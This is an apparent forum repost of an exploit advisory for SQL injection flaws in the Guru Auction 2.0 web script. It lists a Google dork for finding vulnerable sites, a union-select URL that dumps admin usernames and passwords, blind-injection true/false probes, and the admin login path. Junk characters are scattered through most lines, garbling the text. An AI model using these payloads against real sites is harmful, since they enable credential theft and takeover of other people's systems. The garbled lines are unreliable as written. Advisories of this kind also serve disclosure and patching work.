Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
3 @5 W' h4 X2 g( z( j" C7 i2 x j
作者 : v3n0m3 [) e5 O1 D" m7 t( G5 I
应用 : Guru Auction 2.0
8 _/ _1 i! z8 ]* C6 vPrice : $49
% l |# Y& s7 n/ OVendor : http://www.guruscript.com/
# x1 h. I4 J% n& @: zGoogle Dork : inurl:subcat.php?cate_id=2 ?! J# O4 I8 t8 i
2 o$ ?+ }5 }: i' \( a
SQLi p0c:
3 b' U- F$ U- P; G~~~~~~~~~~+ P) q- ^! i& Y# s& \
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--' Y. t1 F7 F9 t, s7 F6 F
! w- I- k# f$ |9 T* v' z - T- K; L! k. K: l+ c' f# A
盲注 p0c:% S8 L6 \+ B) @+ a, |
~~~~~~~~~~
5 R; Z* e% z! j/ I8 r* C7 r+ Lhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true' x* Y9 ?0 e, ]" Y. v$ w* M
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false6 M! t- Z! q6 M& d) @! q
3 t$ j* O+ `+ |( x管理登录入口:
" o8 K8 l7 H7 o3 K~~~~~~~~~~# E) I" k+ [0 U
http://domain.tld/[path]/admin/
; @' k1 s( v, t2 s- ?0 N& Q" X |
发表于 2012-12-31 09:24:05
收藏
支持
反对